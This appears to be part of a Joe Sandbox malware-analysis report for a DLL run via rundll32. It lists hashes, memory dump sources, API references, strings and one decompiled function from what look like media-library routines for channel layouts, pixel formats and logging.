                                                                      • Instruction Fuzzy Hash: F0514A75A047169FD354CF79C880B9AF7E4FF88350F018A2AE999CB301E734E9948B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNEL32(?,?,?,10001281,?,?,?,?,?,?,100013AE), ref: 10001057
                                                                      • _amsg_exit.MSVCRT ref: 10001086
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep_amsg_exit
                                                                      • String ID:
                                                                      • API String ID: 1015461914-0
                                                                      • Opcode ID: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
                                                                      • Instruction ID: 2785d9bf782298c98c7f05eb770d18c25c91c74859540191a5f4291f5604d36f
                                                                      • Opcode Fuzzy Hash: 32c44298f69c23ec634c9dcdada737d11102db2f3ca822c9fd713eb8b7c401c5
                                                                      • Instruction Fuzzy Hash: D031DE70609291CBF341DF69C9C838A77E0EB843D4F11842DED888B65CD7B9D980CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_channel_layout_from_maskmv_freepstrcmp
                                                                      • String ID:
                                                                      • API String ID: 3576703362-0
                                                                      • Opcode ID: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
                                                                      • Instruction ID: f14a3d27c2c21489c07e4dbc689c5fec37a1484687acd34e25a8149a501b133e
                                                                      • Opcode Fuzzy Hash: 820ae5dd8703ee1a0e668245ce805bc40d27f1a58968503d90ea3e7159de7ad7
                                                                      • Instruction Fuzzy Hash: 45312535A083819FE340EF25D48062FBBE1EF84394F52992EF98997314D671EC40CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_strstart
                                                                      • String ID: $xyz$yuvj
                                                                      • API String ID: 2201124280-2071466796
                                                                      • Opcode ID: 39b5a30e90ac46c83331b72173aec11757fe19d2f3b47d718497b41df0643e4c
                                                                      • Instruction ID: a5d947d74d650894119c99c5be97153cec975f5daebd80d8028626f77209e2c2
                                                                      • Opcode Fuzzy Hash: 39b5a30e90ac46c83331b72173aec11757fe19d2f3b47d718497b41df0643e4c
                                                                      • Instruction Fuzzy Hash: 72C1BD355083958FD342CF29C8D079ABBE2EB86385F48496CE4D58B366D274EA58CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_image_get_linesize.F086 ref: 100220C7
                                                                        • Part of subcall function 10021480: mv_pix_fmt_desc_get.F086(?,?,?,?,?,?,?,?,?,?,00000000,?,100B6C20,00000000,10022208), ref: 10021496
                                                                      • mv_log.F086 ref: 10022171
                                                                      • mv_log.F086(?), ref: 100221AE
                                                                      Strings
                                                                      • Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it, xrefs: 1002219E
                                                                      • Picture size %ux%u is invalid, xrefs: 10022154
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log$mv_image_get_linesizemv_pix_fmt_desc_get
                                                                      • String ID: Picture size %ux%u exceeds specified max pixel count %lld, see the documentation if you wish to increase it$Picture size %ux%u is invalid
                                                                      • API String ID: 1737039923-91635712
                                                                      • Opcode ID: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
                                                                      • Instruction ID: d1011bfbbf7dbf5d13950a67888087e963138b3faade39ec3db9adc7e097331a
                                                                      • Opcode Fuzzy Hash: 54d24d788e18d8ea4c466eabd4131f5e9fbc720227a3fc9df816d3be53757df9
                                                                      • Instruction Fuzzy Hash: 9441D0B5A083549FC340CF69C48060AFBE1FBD8750F958A2EF9A8D3350E774E9458B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strcmpstrncmpstrtol
                                                                      • String ID: AMBI
                                                                      • API String ID: 155133989-3084986980
                                                                      • Opcode ID: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
                                                                      • Instruction ID: 080b42f47ecb1617c9eeb941eeb6b1a796e462e2a98a72bb2a37a4396a6a9be9
                                                                      • Opcode Fuzzy Hash: 96e8e9c81ed7be6940826c680e1056b1b9812cca35e7cd8c36495b4e89374ce8
                                                                      • Instruction Fuzzy Hash: 6A21BEB5A0C7858FF350CF2898C064FBAD0EB492D1F11893EF989C7355E235E8858B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908
                                                                      • mv_log.F086 ref: 1002D6D0
                                                                      • mv_log.F086 ref: 1002D719
                                                                      Strings
                                                                      • sample, xrefs: 1002D6AA, 1002D6E7
                                                                      • The value set by option '%s' is not a %s format, xrefs: 1002D6AF
                                                                      • Value %d for parameter '%s' out of %s format range [%d - %d], xrefs: 1002D6EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_logstrcmp
                                                                      • String ID: The value set by option '%s' is not a %s format$Value %d for parameter '%s' out of %s format range [%d - %d]$sample
                                                                      • API String ID: 3828882664-398100351
                                                                      • Opcode ID: 3e07b54a8c5b9266100eb8df6fed5a03186d0a9d5f030d572b3c63d664d80861
                                                                      • Instruction ID: 0c7f2e03ba38d81d1e1e0c9b6d1db8cf13c67e72c17d494c92790103fe4f9750
                                                                      • Opcode Fuzzy Hash: 3e07b54a8c5b9266100eb8df6fed5a03186d0a9d5f030d572b3c63d664d80861
                                                                      • Instruction Fuzzy Hash: F23106B49087458FC310EF28E49450ABBE1FB89250F818A6EE898A7350E735DC85CF82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B8E8
                                                                        • Part of subcall function 1002B8B0: strcmp.MSVCRT ref: 1002B908
                                                                      • mv_log.F086 ref: 1002D5C0
                                                                      • mv_log.F086 ref: 1002D609
                                                                      Strings
                                                                      • The value set by option '%s' is not a %s format, xrefs: 1002D59F
                                                                      • pixel, xrefs: 1002D59A, 1002D5D7
                                                                      • Value %d for parameter '%s' out of %s format range [%d - %d], xrefs: 1002D5DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_logstrcmp
                                                                      • String ID: The value set by option '%s' is not a %s format$Value %d for parameter '%s' out of %s format range [%d - %d]$pixel
                                                                      • API String ID: 3828882664-2904529261
                                                                      • Opcode ID: 6d67d68f37827fc2173720777fded49bdc184725d4fd87e091acf406c810f77d
                                                                      • Instruction ID: 234bf2112a1e99f4284ec0035f949f822d499b6bfe1808c76b51d9f3b31785bb
                                                                      • Opcode Fuzzy Hash: 6d67d68f37827fc2173720777fded49bdc184725d4fd87e091acf406c810f77d
                                                                      • Instruction Fuzzy Hash: 3B2127B4908B558FC300EF28E49050BB7F1FB89254F918A6FF89897350E671DC84CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_dict_setmv_strlcatfstrftime
                                                                      • String ID: %Y-%m-%dT%H:%M:%S$.%06dZ
                                                                      • API String ID: 3046200060-930656424
                                                                      • Opcode ID: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
                                                                      • Instruction ID: 4200585820eefb0ad3589c066a71afa0f6c055d7c0249a28ce441d2d822c6705
                                                                      • Opcode Fuzzy Hash: 8265bdb7039045fb43de9663fc535b0ddd795e0ba8767e98d08ad63409ae019d
                                                                      • Instruction Fuzzy Hash: 3F21B0B5A093419FD350DF29E58069BBBE0FB88354F51C92EF89CC7301E638D8849B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E1000D5CB(void* __edi) {
                                                                      				void* _t75;
                                                                      
                                                                      				while(1) {
                                                                      					L3:
                                                                      					__esi =  *(__edi + 4);
                                                                      					__ebp = __ebp + 1;
                                                                      					if(__esi <= __ebp) {
                                                                      						break;
                                                                      					} else {
                                                                      						goto L4;
                                                                      					}
                                                                      					do {
                                                                      						L4:
                                                                      						if(__ebp >= __esi) {
                                                                      							L42:
                                                                      							__eax = 0x100b1acf;
                                                                      							__esp[1] = 0x100b1acf;
                                                                      							__eax = __esp[6];
                                                                      							 *__esp = __esp[6];
                                                                      							__eax = L100089C0();
                                                                      							L9:
                                                                      							__eax = __esp[6];
                                                                      							__esi = "NONE";
                                                                      							__esp[1] = "NONE";
                                                                      							 *__esp = __esp[6];
                                                                      							__eax = L100089C0();
                                                                      							L10:
                                                                      							if( *__edi != 2) {
                                                                      								goto L3;
                                                                      							}
                                                                      							__edx =  *(__edi + 8);
                                                                      							__eax = __ebp + __ebp * 2;
                                                                      							__ecx = __edx + __eax * 8;
                                                                      							if( *((char*)(__edx + 4 + __eax * 8)) == 0) {
                                                                      								goto L3;
                                                                      							}
                                                                      							goto L12;
                                                                      						}
                                                                      						__eax =  *__edi;
                                                                      						if(__eax == 2) {
                                                                      							__edx =  *(__edi + 8);
                                                                      							__eax = __ebp + __ebp * 2;
                                                                      							__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
                                                                      							__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
                                                                      							__ebx = __ecx - 0x400;
                                                                      							if(__ebp != 0) {
                                                                      								__esp[4] = __ecx;
                                                                      								__eax = 0x100b1acf;
                                                                      								__esp[1] = 0x100b1acf;
                                                                      								__eax = __esp[6];
                                                                      								 *__esp = __esp[6];
                                                                      								__eax = L100089C0();
                                                                      								__ecx = __esp[4];
                                                                      							}
                                                                      							if(__ebx > 0x3ff) {
                                                                      								L38:
                                                                      								if(__ecx <= 0x28) {
                                                                      									L26:
                                                                      									__eax =  *(0x100b2280 + __ecx * 8);
                                                                      									if(__eax == 0) {
                                                                      										L32:
                                                                      										__esp[2] = __ecx;
                                                                      										__eax = __esp[6];
                                                                      										__ebx = "USR%d";
                                                                      										__esp[1] = "USR%d";
                                                                      										 *__esp = __esp[6];
                                                                      										__eax = L100089C0();
                                                                      										goto L10;
                                                                      									}
                                                                      									__esp[2] = __eax;
                                                                      									__eax = "%s";
                                                                      									__esp[1] = "%s";
                                                                      									__eax = __esp[6];
                                                                      									 *__esp = __esp[6];
                                                                      									__eax = L100089C0();
                                                                      									goto L10;
                                                                      								}
                                                                      								if(__ecx != 0xffffffff) {
                                                                      									goto L32;
                                                                      								}
                                                                      								goto L9;
                                                                      							}
                                                                      							L36:
                                                                      							__esp[2] = __ebx;
                                                                      							__eax = "AMBI%d";
                                                                      							__esp[1] = "AMBI%d";
                                                                      							__eax = __esp[6];
                                                                      							 *__esp = __esp[6];
                                                                      							__eax = L100089C0();
                                                                      							goto L10;
                                                                      						}
                                                                      						if(__eax == 3) {
                                                                      							__eax =  *(__edi + 8);
                                                                      							__edx =  *(__edi + 0xc);
                                                                      							__esp[4] = __eax;
                                                                      							__ebx = __eax;
                                                                      							__ecx = __eax;
                                                                      							__esp[5] =  *(__edi + 0xc);
                                                                      							__eax >> 1 = __eax >> 0x00000001 & 0x55555555;
                                                                      							__ecx = __eax - (__eax >> 0x00000001 & 0x55555555);
                                                                      							__ebx = __ecx;
                                                                      							__ecx = __ecx >> 2;
                                                                      							__ebx = __ebx & 0x33333333;
                                                                      							__ecx = __ecx & 0x33333333;
                                                                      							__ecx =  &(__ecx[__ebx]);
                                                                      							__ecx = __ecx >> 4;
                                                                      							__ecx =  &(__ecx[__ecx >> 4]);
                                                                      							__ecx = __ecx & 0x0f0f0f0f;
                                                                      							__ebx =  &(__ecx[__ecx >> 8]);
                                                                      							__ecx = __esp[5];
                                                                      							__eax = __ebx;
                                                                      							__ecx = __ecx >> 1;
                                                                      							__ecx >> 1 = __ecx >> 0x00000001 & 0x55555555;
                                                                      							__ecx = __ecx - (__ecx >> 0x00000001 & 0x55555555);
                                                                      							__eax = __eax >> 0x10;
                                                                      							__edx = __ecx;
                                                                      							__ecx = __ecx >> 2;
                                                                      							__edx = __edx & 0x33333333;
                                                                      							__ecx = __ecx & 0x33333333;
                                                                      							__ebx =  &(__eax[__eax >> 0x10]);
                                                                      							__ecx =  &(__ecx[__edx]);
                                                                      							__eax =  &(__eax[__eax >> 0x10]);
                                                                      							__edx = __ecx;
                                                                      							__eax = __eax & 0x0000003f;
                                                                      							__edx = __ecx >> 4;
                                                                      							__ecx =  &(__ecx[__ecx >> 4]);
                                                                      							__ecx = __ecx & 0x0f0f0f0f;
                                                                      							__ecx = __ecx >> 8;
                                                                      							__ecx =  &(__ecx[__ecx >> 8]);
                                                                      							__ecx = __ecx >> 0x10;
                                                                      							__ebx =  &(__ecx[__ecx >> 0x10]);
                                                                      							__ebx =  &(__ecx[__ecx >> 0x10]) & 0x0000003f;
                                                                      							__ecx =  &(__eax[ &(__ecx[__ecx >> 0x10]) & 0x0000003f]);
                                                                      							__ebx = __ebp;
                                                                      							__esi = __esi - __ecx;
                                                                      							__ebx = __ebp - __esi;
                                                                      							if(__ebp >= __esi) {
                                                                      								L17:
                                                                      								__esp[7] = __ebp;
                                                                      								__eax = __esp[4];
                                                                      								__ecx = 0;
                                                                      								__edx = __esp[5];
                                                                      								__ebp = __edi;
                                                                      								do {
                                                                      									__edi = __edx;
                                                                      									__esi = __eax;
                                                                      									__esi = (__edi << 0x00000020 | __eax) >> __cl;
                                                                      									__edi = __edi >> __cl;
                                                                      									if((__cl & 0x00000020) != 0) {
                                                                      										__esi = __edi;
                                                                      									}
                                                                      									__esi = __esi & 0x00000001;
                                                                      									if(__esi == 0) {
                                                                      										goto L19;
                                                                      									}
                                                                      									_t31 = __ebx - 1; // 0x0
                                                                      									__esi = _t31;
                                                                      									if(__ebx != 0) {
                                                                      										__ebx = __esi;
                                                                      										goto L19;
                                                                      									}
                                                                      									__edi = __ebp;
                                                                      									__ebp = __esp[7];
                                                                      									if(__ebp != 0) {
                                                                      										__esp[4] = __ecx;
                                                                      										__eax = 0x100b1acf;
                                                                      										__esp[1] = 0x100b1acf;
                                                                      										__eax = __esp[6];
                                                                      										 *__esp = __esp[6];
                                                                      										__eax = L100089C0();
                                                                      										__ecx = __esp[4];
                                                                      										goto L38;
                                                                      									}
                                                                      									if(__ecx > 0x28) {
                                                                      										goto L32;
                                                                      									}
                                                                      									goto L26;
                                                                      									L19:
                                                                      									__ecx =  &(__ecx[1]);
                                                                      								} while (__ecx != 0x40);
                                                                      								__edi = __ebp;
                                                                      								__ebp = __esp[7];
                                                                      								if(__ebp == 0) {
                                                                      									goto L9;
                                                                      								}
                                                                      								goto L42;
                                                                      							}
                                                                      							__ebx = 0;
                                                                      							if(__ebp == 0) {
                                                                      								goto L36;
                                                                      							}
                                                                      							__eax = 0x100b1acf;
                                                                      							__ebx = __ebp;
                                                                      							__esp[1] = 0x100b1acf;
                                                                      							__eax = __esp[6];
                                                                      							_t46 = __ebp + 0x400; // 0x401
                                                                      							__ecx = _t46;
                                                                      							__esp[4] = _t46;
                                                                      							 *__esp = __esp[6];
                                                                      							__eax = L100089C0();
                                                                      							__ecx = __esp[4];
                                                                      							if(__ebp <= 0x3ff) {
                                                                      								goto L36;
                                                                      							}
                                                                      							goto L32;
                                                                      						}
                                                                      						if(__eax == 0) {
                                                                      							__eax =  *(__edi + 8);
                                                                      							__ebx = __ebp;
                                                                      							__edx =  *(__edi + 0xc);
                                                                      							__esp[4] =  *(__edi + 8);
                                                                      							__esp[5] =  *(__edi + 0xc);
                                                                      							goto L17;
                                                                      						}
                                                                      						if(__ebp != 0) {
                                                                      							goto L42;
                                                                      						}
                                                                      						goto L9;
                                                                      						L12:
                                                                      						__eax = __esp[6];
                                                                      						__ecx =  &(__ecx[4]);
                                                                      						__ebp = __ebp + 1;
                                                                      						__esp[2] = __ecx;
                                                                      						__ecx = "@%s";
                                                                      						__esp[1] = "@%s";
                                                                      						 *__esp = __esp[6];
                                                                      						__eax = L100089C0();
                                                                      						__esi =  *(__edi + 4);
                                                                      					} while (__esi > __ebp);
                                                                      					break;
                                                                      				}
                                                                      				if(__esi == 0) {
                                                                      					__eax = 0;
                                                                      					__esp[2] = 0;
                                                                      					__eax = "%d channels";
                                                                      					__esp[1] = "%d channels";
                                                                      					__eax = __esp[6];
                                                                      					 *__esp = __esp[6];
                                                                      					L100089C0() = 0;
                                                                      				} else {
                                                                      					__eax = __esp[6];
                                                                      					__edx = 0x100b1ad1;
                                                                      					__esp[1] = 0x100b1ad1;
                                                                      					 *__esp = __esp[6];
                                                                      					L100089C0() = 0;
                                                                      				}
                                                                      				return _t75;
                                                                      			}





                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_bprintf
                                                                      • String ID: @%s$NONE
                                                                      • API String ID: 3083893021-9228147
                                                                      • Opcode ID: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
                                                                      • Instruction ID: 7566f4ee250c6b1008f1cbc21f7ab5f057a1ffbd92fde749fdda637f05722331
                                                                      • Opcode Fuzzy Hash: 42121a472de4cb58ea8b3f161935e652dd00ef3bbb3abb2b6736c95388f2513a
                                                                      • Instruction Fuzzy Hash: 8C114C75909B1A8BE720EF18C58006EF7E1FB443D4F55891EE889A7219D731EC94CBE2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Error occurred in fstat(): %s, xrefs: 1001950B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _close_errnomv_logmv_strerrormv_strlcpy
                                                                      • String ID: Error occurred in fstat(): %s
                                                                      • API String ID: 1199337903-68092211
                                                                      • Opcode ID: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
                                                                      • Instruction ID: dfd730866d5ba72d1ec682aa82f713c85e766a8eb03f77e440fb808261e44811
                                                                      • Opcode Fuzzy Hash: fedef3c115d41d530a9bfdcd0bfafda126d4511fd0f21c34fa7b612a76f75a20
                                                                      • Instruction Fuzzy Hash: A3F092B4819755DFC310DF14C48425EFBE4FF84700F51881EE5D997321DB78A9459B86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
